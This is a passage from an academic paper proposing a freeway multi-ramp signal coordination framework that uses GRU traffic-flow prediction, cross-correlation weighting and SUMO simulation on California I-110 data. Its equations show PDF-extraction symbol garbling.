method to achieve synergistic control of both (Hegyi, De Schutter & Hellendoorn, 2005; Van de Weg et al., 2019). Multi-ramp coordination signal optimization methods can be mainly divided into model-based and model-free methods (Papageorgiou & Kotsialos, 2002). The optimal coordination method is realized based on the traffic flow model. According to the real-time traffic flow information, the control rate is solved by taking the shortest travel time and waiting time as the control objectives and the mainline capacity and ramp queue length as the constraints. Traffic flow models such as the Payne model (Chang & Li, 2002), the cell transmission model (Chen, Lin & Jiang, 2017; Meng & Khoo, 2010; Schmitt, Ramesh & Lygeros, 2017) and METANET (Dabiri & Kulcsar, 2017; Frejo & Camacho, 2012; Kontorinaki, Karafyllis & Papageorgiou, 2019) are widely used. Meshkat applied a quantitative hierarchical model to ramp coordination signal optimization for the first Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 4/24 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ time (Meshkat et al., 2015). Chen added real-time OD information based on Meshkat to determine the priority of on-ramp flow through the total vehicle travel distance (Chen et al., 2019b). In the field of the model-free method, most researches focus on various heuristic algorithms, such as HELPER (Lipp, Corcoran & Hickman, 1991), SWARM (Paesani et al., 1997) and HERO (Papamichail et al., 2010b). In meanwhile, many researchers adopt a data-driven approach to optimize ramp signals. Chen uses large-scale traffic data and integrates external weather factors to analyze and model the evolution pattern of traffic congestion. The signal duration adjusts dynamically through dynamic congestion threshold classification and congestion mode clustering. For the first time, the analysis of big traffic data was applied to ramp signal optimization, with more careful considerations and more consistent with the actual situation (Chen et al., 2019a). Zhang uses large-scale vehicle trajectory data to extract the vehicle on-ramp behavior pattern, trace the source of congestion formation, and optimize the signal duration of multiple ramps (Zhang et al., 2019). We combine the dynamic traffic flow correlation based on the traditional heuristic method. The excess traffic demand is assigned by tracing the distribution weights of the congestion sources. FRAMEWORK DESIGN In this article, the coordinated signal optimization framework is divided into three parts: data pre-processing, traffic flow analysis and signal optimization scheme generation. The coordinated signal optimization framework aims to combine dynamic traffic flow information to optimize real-time signals dynamically. Initially, the framework first restores and organizes the raw traffic data through the data pre-processing module. Furthermore, the smoothed historical traffic flow data is trained to obtain the offline model. Secondly, we predict the real-time traffic flow data by the traffic flow analysis module and perform correlation analysis on the predicted traffic data. The weight matrix is obtained by combining distance, ramp flow and traffic correlation. Finally, we develop a coordinated signal optimization scheme for signal timing of multiple ramps. The structure of framework is shown in Fig. 1. Data pre-processing Time series data is a set of observations, and time series are generally discrete collections of discrete points that contain temporal relationships in contrast to other vectors. A set of traffic flow time series data is continuous observed values collected by a loop detector according to equally spaced time stamps. A set of time series can be represented as Q¼ q1; q2; …; qi; …; qn½ �, where qi is the observed traffic flow value based on the time index value. But the raw data is not organized and needs to be filtered, repaired and smoothed. After data cleaning, it will become serial data. The raw traffic data is the traffic information of each highway’s detection point at a certain moment. We choose roads with complete data. Make sure that there is the least Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 5/24 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ amount of missing data in two consecutive month time periods. The final data for the experiment is obtained and some examples are shown in Table 1 below. Although the quality of the data obtained through screening is high, noise and missing data inevitably occur, which can negatively affect traffic flow prediction results. Many situations can cause missing and abnormal traffic data, such as data anomalies caused by sensor failures and missing data during data transmission. Noise points are irregularly distributed in the data set, and the judgment of noise points is mainly based on the distribution of data before and after the noise points. If a point is significantly higher or lower than the data before and after, or the value is higher than the normal situation, we judge it as a noise point and remove it. After processing the noise points, it will produce discontinuity of time series, i.e. missing data. In addition, the data itself may miss some points of data because of equipment failure and other reasons, so it is significant for data repairing. The processing methods for missing data are divided into short-time missing and long-time missing. Short-time missing refers to missing data around 5 min. Figure 1 Multi-ramp coordinate signal optimization framework. Full-size DOI: 10.7717/peerj-cs.446/fig-1 Table 1 An example of the processed data. Timestamp Station Direction … Total flow (vel) Avg occupancy (%) Avg speed (km/h) 02/05/2019 17:15:00 763720 N … 376 0.3254 18.9 02/05/2019 17:20:00 763720 N … 412 0.322 19.8 02/05/2019 17:25:00 763720 N … 314 0.4013 17.6 02/05/2019 17:30:00 763720 N … 319 0.4011 17.7 02/05/2019 17:35:00 763720 N … 330 0.4087 16.9 02/05/2019 17:40:00 763720 N … 350 0.3654 17.3 02/05/2019 17:45:00 763720 N … 362 0.3815 17.5 02/05/2019 17:50:00 763720 N … 333 0.3778 17.5 02/05/2019 17:55:00 763720 N … 319 0.3929 17.7 02/05/2019 18:00:00 763720 N … 397 0.1774 24.8 Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 6/24 http://dx.doi.org/10.7717/peerj-cs.446/fig-1 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ We directly use the last time point instead. Long-time missing refers to the absence of multiple consecutive time points, and we take the average value of the historical data for the same period as a substitute. Finally, the data are smoothed based on the use of the locally estimated scatterplot smoothing method. The processed data is smoother and more continuous than the raw data, which is consistent with the real situation and helps the neural network’s training, and improves the neural network’s prediction performance. This article uses neural network and time series methods to analyze dynamic traffic flows. In order to ensure real-time optimization, we first make a short-term prediction of the traffic flow, because accurate traffic flow forecasting is a key part of the overall framework. This article uses GRU neural network for online traffic flow prediction. The neural network can better describe the randomness and nonlinearity of traffic flow (Fu, Zhang & Li, 2016) and get more accurate prediction results compared to linear models such as ARIMA. GRU was proposed by Cho et al. (2014) and is very similar to LSTM, but is simpler to compute compared to LSTM. Figure 2 shows the structure of GRU neural network. The input and output structure of GRU is similar to a typical recurrent neural network. The hidden state of memory cells is computed in the following formulas: zt ¼ sðWz � ½ht�1; xt�Þ (1) rt ¼ sðWr � ½ht�1; xt�Þ (2) ~ht ¼ tanhðW � ½rt � ht�1; xt�Þ (3) ht ¼ ð1 � ztÞ � ht�1 þ zt � ~ht (4) For the current node, the input values are the current input xt and the hidden state ht−1 containing the information of the previous node, and the output values are the output yt Figure 2 The structure of GRU networks. Full-size DOI: 10.7717/peerj-cs.446/fig-2 Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 7/24 http://dx.doi.org/10.7717/peerj-cs.446/fig-2 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ of the current node and the hidden state ht containing the information of this node. GRU first obtains the gating states z and r by two input values, where z is the gate that controls the update and r is the gate that controls the reset. Then it calculates the candidate hidden layer ht, which represents the new information at the current moment, and controls the retention of the previous memory with r. Finally, both forgetting and remembering steps are performed simultaneously, using the update gate z to control the amount of information that needs to be forgotten from the previous moment’s hidden layer ht−1, and the amount of memory for the currently hidden layer information ht. Traffic flow analysis Once the predicted values of the mainline and ramp flow are obtained, we measure the flux-correlation between flow-series, to find the relationship between mainline and ramps. In this article, we choose the cross-correlation algorithm (Paparrizos & Gravano, 2015) to measure the correlation, which is a similarity measure for time-lagged time series of traffic flow. The value of cross-correlation ranges between [−1, 1], while closing to 1, indicating a strong correlation and a strong negative correlation close to −1. For the time series X = (x1, x2, …, xn) and Y = (y1, y2, …, yn), the reciprocal method holds Y stationary so that X slides along Y. For each slide s of X, calculate their inner product as shown in the following equation. X ¼ ðx1; x2; …; xnÞ (5) Ys ¼ ð0; . . . ; 0 zfflfflfflffl}|fflfflfflffl{jsj ; y1; y2; . . . ; Yn�sÞ S � 0 ðy1�s; . . . ; yn�1; yn; 0; . . . ; 0|fflfflfflffl{zfflfflfflffl} jsj Þ S , 0 8>>>< >>>: (6) For all possible slides s, the inner product CC (X, Y) is computed as the similarity between the two time series X and Y. The equation is shown below. CCðX; YÞ ¼ Pn�s i¼1 xsþi � yi s � 0 Pnþs i¼1 xi � yi�s s < 0 8>>< >>: (7) The cross-correlation is the maximum value of the inner product, which represents the similarity between X and Y under optimal phase sliding s conditions. Because under optimal sliding conditions, pattern-similar X and Y are exactly aligned, the internal product of both is maximal. Therefore, the Cross-correlation method overcomes the phase sliding problem and compares the shape similarity of two-time series. In practice, the normalized value of Cross-correlation is usually used to limit the range to be within [−1, 1], where 1 means strong correlation and −1 means that they are completely opposite. Besides, a positive NCC means that two series are in the same direction, while a negative NCC means that when one series tends to increase, the other tends to decrease and vise versa. The Eq. (8) defines NCC. Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 8/24 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ NCCðX; YÞ ¼ max s ð CCðX; YÞ Xk k2 � Yk k2 Þ (8) Generally, the distance between the bottleneck and ramp determines the weight matrix. In this article, we combine several factors to determine the weight matrix, including correlation, predicted ramp flow and distance. We measure the cross-correlation between the predicted flow-series of bottleneck and upstream ramps. If the value is greater than 0, it means that the ramps positively correlated with the bottleneck. The magnitude of the coefficient represents the degree of correlation. The value of correlation represents by NCC, together with the physical distance d(i, j) between the ramp and the bottleneck, and the predicted ramp traffic flow q(j) are taken as feature parameters of the weight matrix. If the number of correlations is less than 0, it means that the ramp flow is negatively correlated with the bottleneck flow, so the correlation has the opposite effect. Therefore, we only consider the physical distance and the predicted ramp flow as the feature parameters of the weight matrix. As Eq. (9) shows, w(i, j) represents the weight of the j-th ramp for the i-th bottleneck. d(i, j) and q(j) are normalized parameters. l represents the correlation limitation, less than which means weak correlation between the time series, while a greater set shows strong correlation. This value is generally intermediate, in this Equation is 0.5. a, b represents the weight of the temporal correlation coefficient, in the weak correlation condition, correlation shows light impact, while the strong correlation condition has a greater impact. wði; jÞ ¼ a1 � dði; jÞþb1 � qðjÞ NCC 2 ½�1; 0� a2 � NCCði; jÞ þ b2 � dði; jÞþð1 � a2 � b2Þ � qðjÞ NCC 2 ð0; m� a3 � NCCði; jÞ þ b3 � dði; jÞþð1 � a3 � b3Þ � qðjÞ NCC 2 ðm; 1� 8< : (9) To explore the factors that are most relevant to the traffic states, (Yu et al., 2019) used the gray correlation analysis to measure the similarity between the flow, occupancy, density curves, and the speed curves. Grey correlation determines the degree of association between two factors based on how similar or dissimilar the trends are. It is often used to determine the relative strength of a project influenced by other factors. In this article, we compare the bottleneck speed curves with correlation value, the flow value of the on-ramps and the distance to optimize the parameters in Eq. (9). For Attri;j ¼ ða1;j; a2;j; …; ak;jÞ; ai;j 2 ncc; inflow; distancef g, we can obtain the degree of association GRCi;j ¼ ðgrc1;j; grc2;j; …; grck;jÞ; Pk i¼1 grci;j ¼ 1, and then the influence degree of ramp inflow and downstream speed. The influence degree shows how much influence will the factor affects downstream speed as Eq. (10), where the rs means road section number and k represents the factor number. InfluenceDegreeinflow ¼ 1 rs Xk i¼1 Xrs j¼1 grci;j (10) Equation (11) calculates the final weight matrix. Where m is the number of bottlenecks, this weighting matrix will be used in signal coordination optimization to Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 9/24 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ assign the excess traffic demand, in order to ensure the rationality of the traffic reduction at each ramp. Wij ¼ wð1; 1Þ � � � wð1; mÞ .. . � � � .. . 0 .. . wði; jÞ .. . .. . 0 � � � .. . 0 0 wðn; mÞ �� (11) Coordinated signal optimization The coordinated signal optimization method proposed in this article implements a dynamic weight matrix between the ramp and mainline. The application of this matrix in the bottleneck algorithm is mainly reflected in the calculation of the coordinated metering rate. The bottleneck algorithm first determines whether the road segment downstream of the ramp is a bottleneck based on the real-time occupancy or density of the road segment. When there are no bottlenecks in the multi-ramp area, the local metering rate is applied to each on-ramp. When a bottleneck generates in a road segment, the excess traffic demand for each bottleneck generated needs to be allocated to each ramp. The more restrictive value of the coordinated and local metering rates is taken, and the final ramp metering rate is obtained by considering the ramp queue length limitation. Figure 3 shows a segment of multi-ramp road section. Initially, the local metering rate rL of each ramp at k time is calculated according to Eq. (12). The K represents metering parameter, and r̂ is the critical density of ramp downstream road section, rðk � 1Þ is average density of downstream road section at last time step. rLðj; k þ 1Þ ¼ rLðj; kÞ þ K � ½r̂ � rðkÞ� (12) Defining the difference between the entering flow (including the upstream inflow from the mainline and the flow entering the entrance ramp), and exiting flow (including the downstream outflow from the mainline and the flow exiting the exit ramp) as the excess demand for that segment, see Eq. (13). Ddði; k þ 1Þ ¼ qinði; kÞ þ qonði; kÞ � qoutði; kÞ � qoffði; kÞ (13) If the average density in a control cycle is higher than the threshold (Eq. (14)); at the same time the excess demand is more than zero (Eq. (15)), there is a risk of breakdown, defining such a segment as a bottleneck. r i; kð Þ . rthreshold ið Þ (14) Ddði; k þ 1Þ > 0 (15) It is necessary to calculate the coordinated metering rate to eliminate bottlenecks, and the coordinated metering rate is calculated as shown in the Algorithm 1. Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 10/24 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ Every bottleneck needs to reduce the excess demand Ddði; k þ 1Þ, when Ddði; k þ 1Þ < 0, the bottleneck is eliminating, qreductionði; k þ 1Þ ¼ 0. Eq. (17) shows the volume reduction of every ramp, Wji is weight matrix. The max volume reduction is selected to calculate the coordinate metering rate in Eq. (18), based on metering rate r(j, k) last time step. qreductionði; k þ 1Þ ¼ Ddði; k þ 1Þ (16) qreductionði; j; k þ 1Þ ¼ qreductionði; k þ 1Þ � Wji (17) rCðj; k þ 1Þ ¼ rðj; kÞ � max i ½qreductionði; j; k þ 1Þ� (18) The system metering rate adopts the more restrictive of coordinate metering rate and local metering rate as Eq. (19) shows. r0ðj; k þ 1Þ ¼ min½rLðj; k þ 1Þ; rCðj; k þ 1Þ� (19) If the ramp metering rate approaches zero, it will cause a ramp spillback, thus affect surface traffic. Therefore, the metering rate needs to be constrained based on the queue length of the ramp. In Eq. (20), aðj; kÞ is the arrival rate of vehicles entering the entrance Figure 3 Bottleneck section. Full-size DOI: 10.7717/peerj-cs.446/fig-3 Algorithm 1 Coordinate metering rate calculation. Input: Road section i; weight matrix Wji Output: Coordinate metering rate rC 1 for i in road section do 2 if density > threshold and Excess demand > 0 then 3 qreduction (i, k + 1) = Δd (i, k + 1); 4 qreduction (i, j, k + 1) = qreduction (i, k + 1) ⋅Wji; 5 else i = i + 1 6 rC (j, k + 1) = r (j, k) − maxi [qreduction (i, j, k + 1)]; 7 return rC Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 11/24 http://dx.doi.org/10.7717/peerj-cs.446/fig-3 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ ramp, v̂ðjÞ is the capacity of the j-th ramp, vðj; kÞ is the queue length of the j-th on-ramp at the previous time step, and T refers to a time step. The metering rate can be obtained by Eq. (21). rqueueðj; k þ 1Þ ¼ aðj; kÞ � 1 T ½v̂ðjÞ � vðj; kÞ� (20) rðj; k þ 1Þ ¼ max½r0ðj; k þ 1Þ; rqueueðj; k þ 1Þ� (21) The green duration is calculated based on the metering rate and sent to each signaler in Eq. (22). Where C(j) indicates the signal cycle duration and rs(j) indicates the saturation flow rate. gðj; k þ 1Þ ¼ rðj; k þ 1Þ rsðjÞ � CðjÞ (22) EXPERIMENT Traffic Flow Prediction The dataset used in this article is collected from the California PEMS platform, which provides 5-min intervals of freeway mainline loop detector data (both speed and flow) and on-ramp passing data. We select the flow data for the northbound upstream mainline and on-ramp of the I110 freeway from 1 January 2020 to 26 February 2020, which has four on-ramps with a total length of approximately 3.8 KM. The detector deployment locations show in Fig. 4. Combined with the local traffic flow characteristics, it can be found that the traffic flow is at its peak during 15:00–18:00, which is suitable for applying ramp control. Ramp control is not sufficient when the traffic flow is low, smooth traffic flow can be achieved using no control or simple demand capacity control (Papageorgiou & Kotsialos, 2002). We plotted the average traffic flow curve of the bottleneck road section over 2 months in Fig. 5. The red curve in the figure indicates the average traffic flow on the road section during the 2 months. The blue part indicates the interval formed by the maximum and minimum traffic volumes. It can be seen from the graph that the traffic flow starts to increase at 6:00 and stays at a high level for a long time afterward. The interval we selected is the time segment with relatively high traffic volume, which helps verify the effectiveness of the signal optimization scheme. Based on the above findings, flow data from 15:00 to 18:00 on 13 February 2019 upstream of the mainline and the four ramps were selected as inputs, as shown in Fig. 6. Figure 4 Selected detectors and deployment locations. Full-size DOI: 10.7717/peerj-cs.446/fig-4 Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 12/24 http://dx.doi.org/10.7717/peerj-cs.446/fig-4 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ In this article, the GRU neural network is used for traffic flow prediction. The best lag time can minimize the prediction error of the model, and we use the maximum lag time of 60 min. It is more reasonable to use 12 historical values to predict the latter value, and fewer historical values lead to more deviations in the prediction results. More historical values lead to long computation time and are prone to overfitting. In addition to the lag time, we also need to choose the best parameters for the deep neural network model. We use a two-layer GRU neural network with 64 hidden cells in each layer, a batch size of 256, and a max epoch of 600. The training set uses forty-eight days of data (84.2% of the total number of days), the test set uses the remaining nine days of data (15.8%). We compare the GRU neural network with two other methods, SAEs and LSTMs, respectively. We use the rooted mean squared error (RMSE) and mean absolute percentage error (MAPE) as the metric to evaluate these methods. When the predicted value exactly Figure 5 Traffic volume during 2 months. (A) Freeway mainline traffic volume during 2 months. (B) Freeway ramp traffic volume during 2 months. Full-size DOI: 10.7717/peerj-cs.446/fig-5 Figure 6 Mainline and ramp flow demand. Full-size DOI: 10.7717/peerj-cs.446/fig-6 Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 13/24 http://dx.doi.org/10.7717/peerj-cs.446/fig-5 http://dx.doi.org/10.7717/peerj-cs.446/fig-6 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ matches the true value, RMSE is equal to 0, indicating a perfect model. RMSE can be calculated as follows: RMSE ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi 1 m Xm i¼1 ðyi � ŷiÞ2 s (23) where yi is the ground truth and ŷi is the prediction value, m represents the total number of predictions. Mean absolute percentage error of 0% indicates a perfect model, while a MAPE greater than 100% indicates a flawed model. MAPE can be calculate as follows: MAPE ¼ 100% m Xm i¼1 ŷi � yi yi �� (24) where yi is the ground truth and ŷi is the prediction value, m represents the total number of predictions. The Table 2 shows the prediction results of various methods. It can be seen that in the RMSE, both LSTM and GRU are much better than SAEs. There is little difference between LSTM and GRU. In the MAPE column, GRU performs the optimal prediction effect. Figure 7 shows how the predicted value compares with the observed value and other methods. It can be seen from the figure that all curves fit the observed data. During the low-flow phase, the SAEs were predicted to be substantially higher than the true values. And the LSTM and GRU are much closer to the true values. SUMO platform Simulation of Urban Mobility (Lopez et al., 2018; Krajzewicz et al., 2012) used in this article is a free and open-source traffic system simulation software compared with the above microsimulation platforms. It can realize microscopic control of traffic flow. Each vehicle’s route on the specific road can be planned individually. Furthermore, it has a mature code control module, which makes data analysis more convenient. The entire SUMO-based simulation framework shows in Fig. 8. We model multi-ramp section in SUMO, and entering the traffic flow data during the morning peak period. We use the IDM model as car following model. The IDM model (Treiber, Hennecke & Helbing, 2000) is by far the most complete and simple accident-free theoretical heeling model, which belongs to the class of expectation measures. The IDM model is described in Eqs. (25) and (26). Table 2 The performance comparisons. Method RMSE MAPE (%) SAEs 22.18 8.75 LSTM 14.95 4.21 GRU 15.21 4.14 Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 14/24 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ v0a ¼ a 1 � va v0 � �d � s � va; Dvað Þ sa � �2" # (25) s� v; Dvð Þ ¼ s0 þ s1 ffiffiffiffi v v0 r þ Tav þ vDv 2 ffiffiffiffiffi ab p (26) The vehicle acceleration v0a can be obtained by minimum vehicle distance s � v; Dvð Þ, velocity, vehicle clearance from the vehicle in front sa and expected velocity v0. In Eq. (26), T represents safety time step, ab represent the max acceleration and the expected deceleration ability of vehicles. Dv is speed difference with the car in front, s0 and s1 are distance with congested traffic. For model parameter calibrations, see Table 3 below. Besides, the channel change model is also very critical. The vehicle lane change model we have chosen is LC2013 (Erdmann, 2015). In conjunction with the application in the related literature (Papamichail et al., 2010a), the common evaluation metrics are Average Travel Time (ATT), which indicates the travel time of mainline vehicles; Average Waiting Time (AWT), which indicates the waiting Figure 8 SUMO simulation framework. Full-size DOI: 10.7717/peerj-cs.446/fig-8 Figure 7 Result of traffic flow prediction. Full-size DOI: 10.7717/peerj-cs.446/fig-7 Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 15/24 http://dx.doi.org/10.7717/peerj-cs.446/fig-8 http://dx.doi.org/10.7717/peerj-cs.446/fig-7 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ time of ramp vehicles. Besides, the density and speed of the bottleneck locations are selected as evaluation metrics, which can reflect the ability to alleviate congestion at the bottleneck locations. RESULTS This article uses SUMO simulation software to perform experiments on four on-ramp scenarios. The correlation between individual ramps and bottlenecks can be obtained by the method above, leading to the weight matrix. We have used various methods for simulation. No signal method: ramp signal is all green. In this case, the on-ramp traffic can enter the freeway without obstruction. This is used as a control experiment to demonstrate the effect of signal optimization. Distance-based method: only the spatial distance between the ramp and the bottleneck is used as a weighting factor for traffic assignment. Such an approach would overweight the ramp closest to the bottleneck and assign less weight to the other ramps upstream. Such an approach has an absolute static nature. Distance-flow-based method: use spatial distance and the on-ramp flow as the assigned weight factors. Such an approach considers the contribution of the on-ramp flow to the bottleneck congestion compared to considering only the spatial distance. However, the on-ramp flow may flow at other off-ramps and is not necessarily the root cause of congestion. Traffic states-based method: use spatial distance, ramp flow, and dynamic traffic flow correlation as the assigned weighting factors. Such a method adds the traffic flow correlation between ramps and bottlenecks to the above method. It better traces the source of congestion and is dynamic and predictable. Table 4 shows the results of the weights matrix generated from different factors. Our correlation measurement of traffic flow-series reveals that the closest on-ramp upstream may not significantly impact the bottleneck. A particular ramp further upstream may have a greater impact on the bottleneck because of the faster flow growth trend. Before implementing the signal optimization algorithm, each bottleneck road section's critical density needs to be obtained. As the traffic flow is sensitive to the critical density Table 3 Model parameters of IDM. Attribute Value Description v0 18.87 m/s Expected velocity of vehicles a 2.6 m/s The max acceleration ability of vehicles b 4.5 m/s The expected deceleration ability of vehicles s0, s1 2.5 m Distance with congested traffic T 2 s Safety time step d 4 Acceleration index l 5 m Vehicle length Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 16/24 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ changes, the traffic state can be divided near the critical point. The four bottleneck sections’ critical densities are 60, 67, 75 and 90 veh/km, as shown in Fig. 9. We test the performance of the algorithm under normal and heavy demands. There are five lanes and two lanes in the mainline and ramp, separately. So, we use 9,000 pcu/h as mainline saturated flow rate and 3,600 pcu/h as ramp saturated flow rate (Niittymäki & Pursula, 1997). According to the Fig. 5A, we can observe that between 15:00 and 18:00, the road section’s average traffic flow is about 6,500 pcu/h, which is about 72.2% of the saturated flow rate. Moreover, the maximum value is approximately 7,300 pcu/h, about 81.1% of the saturation flow rate. In the simulation process, we found that using real mainline demand can cause a congestion situation. Instead of increasing the mainline Table 4 Weight matrix based on different factors. Bottleneck 1 Bottleneck 2 Bottleneck 3 Bottleneck 4 Distance based Ramp 1 1.00 0.04 0.02 0.02 Ramp 2 0.00 0.96 0.05 0.03 Ramp 3 0.00 0.00 0.93 0.06 Ramp 4 0.00 0.00 0.00 0.89 Distance and flow based Ramp 1 1.00 0.20 0.16 0.10 Ramp 2 0.00 0.80 0.28 0.17 Ramp 3 0.00 0.00 0.56 0.09 Ramp 4 0.00 0.00 0.00 0.64 Traffic states based Ramp 1 1.00 0.20 0.07 0.04 Ramp 2 0.00 0.80 0.18 0.07 Ramp 3 0.00 0.00 0.76 0.25 Ramp 4 0.00 0.00 0.00 0.64 Figure 9 Flow-density scatter plot of bottleneck section. (A) Flow and density of bottleneck1. (B) Flow and density of bottleneck2. (C) Flow and density of bottleneck3. (D) Flow and density of bottleneck4. Full-size DOI: 10.7717/peerj-cs.446/fig-9 Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 17/24 http://dx.doi.org/10.7717/peerj-cs.446/fig-9 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ traffic, we set up a scenario of increasing ramp traffic to simulate heavy ramp traffic and evaluate the signal optimization scheme. As shown in the Fig. 5B, the average traffic flow on the ramp between 15:00 and 18:00 is about 300 pcu/h. This value is far below the saturated flow rate of 3,600 pcu/h. Therefore, we added a heavy demand to simulate the busy condition of the ramp. The traffic flow under heavy demand is about 450–500 pcu/h, accounting for about 12.5–13.8% of the saturation flow rate. The normal demand represents releasing vehicles at 66.7% of the mainline saturated traffic demand, 8.3% of the ramp saturated traffic demand. The heavy demand releases vehicles at 66.7% of the mainline saturated traffic demand, 13.8% of the ramp saturated traffic demand. Table 5 below shows the performances of each algorithm. It shows that the mainline ATT improvement using the ramp signal optimization method is limited in normal demand. In contrast, it has a larger improvement in the ramp AWT. Because when traffic demand is low on the mainline, the on-ramp merges into the mainline, and the ramp signal reduces movement efficiency. In terms of movement through the bottleneck, the traffic-state-based method reduces bottlenecks’ density to a greater extent (7.1%) than the other approaches (4.9% and 6.7%). Compared to other methods, our method has a smaller gap in speed through the bottleneck, but the improvement is relatively significant (5.2%). The heavy demand scenario simulates over-congestion during peak periods. The signal optimization is more pronounced than the no signal scenario, with 4.5%, 5.2% and 5.5% improvements in mainline ATT, respectively. However, a smaller increase in ramp AWT compared to normal demand. The approach that considers traffic states effectively reduces the bottleneck’s density under heavy demand, reducing it by an average of 15.38 veh/km (13%) and increasing 4.5% of the average speed of vehicles passing through the bottleneck. Figure 10 shows the average density of the four bottlenecks under normal demand using different signal optimization algorithms. It demonstrates persistent congestion in the seventh road section, for which no control is often not possible. In contrast, the use of signal optimization can significantly reduce congestion. The distance-flow-based method and traffic-state-based method have a better performance on the congestion reduction. The traffic-state-based method keeps density to a much lower range in 40–60 min. Table 5 Performance under different demand. Demand Method Mainline travel time (s) Ramp waiting time (s) Bottleneck density (veh/km) Bottleneck velocity (km/h) Normal demand No signal 269.55 7.42 90.06 23.05 Distance based 264.35 (−1.9%) 8.86 (+19.4%) 85.69 (−4.9%) 23.92 (+3.8%) Distance and flow based 264.06 (−2.0%) 8.95 (+20.6%) 84.02 (−6.7%) 23.89 (+3.6%) Traffic states based 263.47 (−2.2%) 8.93 (+20.3%) 83.62 (−7.1%) 24.26 (+5.2%) Heavy demand No signal 285.02 11.65 118.20 22.45 Distance based 272.21 (−4.5%) 13.72 (+17.8%) 107.90 (−8.7%) 23.27 (+3.6%) Distance and flow based 270.15 (−5.2%) 12.92 (+10.9%) 105.03 (−11.2%) 23.44 (+4.4%) Traffic states based 269.25 (−5.5%) 12.67 (+8.8%) 102.82 (−13.0%) 23.46 (+4.5%) Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 18/24 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ Figure 10 Density heatmap on normal demand. (A) No signal. (B) Distance-based method. (C) Distance-flow-based method. (D) Traffic-state- based method. Full-size DOI: 10.7717/peerj-cs.446/fig-10 Figure 11 Density heatmap on heavy demand. (A) No signal. (B) Distance-based method. (C) Distance-flow-based method. (D) Traffic-state- based method. Full-size DOI: 10.7717/peerj-cs.446/fig-11 Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 19/24 http://dx.doi.org/10.7717/peerj-cs.446/fig-10 http://dx.doi.org/10.7717/peerj-cs.446/fig-11 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ Figure 11 shows the average density of the four bottlenecks under heavy demand using different algorithms. It shows that the third and fifth road sections also experience intermittent congestion in addition to the seventh road section. The traffic-state-based method effectively relieves congestion in the fifth and seventh road segments and maintains a lower density at 20–60 and 120–140 min comparing to the others. Figure 12 shows the variation in mainline AWT under different demand conditions. It illustrates that the signal optimization method keeps the mainline ATT relatively low regardless of the demand level. The traffic-state-based method exhibits lower ATT at more moments, which means smoother vehicle movement. CONCLUSIONS To address expressway congestion, we propose a coordinated signal optimization framework based on dynamic traffic states. In this article, the GRU neural network was used to predict the traffic flow. Cross-correlation obtains the dynamic correlation between the bottleneck and ramp traffic flow. Our framework considers both static road property and dynamic traffic state to achieve signal optimization compared with previous research. The performance of our algorithm was verified on the SUMO simulation platform. The results show that our approach can reduce the mainline bottleneck density by 7.1% and 13.0% under normal and heavy demand, separately. We also found that it is a more reasonable option in the lower traffic demand scenario without using a signal. Moreover, in congested scenarios, the use of signal optimization can reduce the density of the mainline. In future work, we will work on signal optimization solutions for the broad ramp area. Using detailed traffic trajectory data to analyze congestion’s spatial and temporal characteristics, we will develop a coordinated signal optimization program. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work is supported by the National Natural Science Foundation of China (62073295 and 62072409), the Zhejiang Province Basic Public Welfare Research Project (LGG20F030008), Figure 12 Total travel time. (A) Normal demand situation. (B) Heavy demand situation. Full-size DOI: 10.7717/peerj-cs.446/fig-12 Liu et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.446 20/24 http://dx.doi.org/10.7717/peerj-cs.446/fig-12 http://dx.doi.org/10.7717/peerj-cs.446 https://peerj.com/computer-science/ the Zhejiang Provincial Natural Science Foundation (LR21F020003), and Fundamental Research Funds for the Provincial Universities of Zhejiang (RF-B2020001). There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Natural Science Foundation of China: 62073295 and 62072409. Zhejiang Province Basic Public Welfare Research Project: LGG20F030008. Zhejiang Provincial Natural Science Foundation: LR21F020003. Fundamental Research Funds for the Provincial Universities: RF-B2020001. Competing Interests Xiangjie Kong is an Academic Editor for PeerJ. Author Contributions � Zhi Liu conceived and designed the 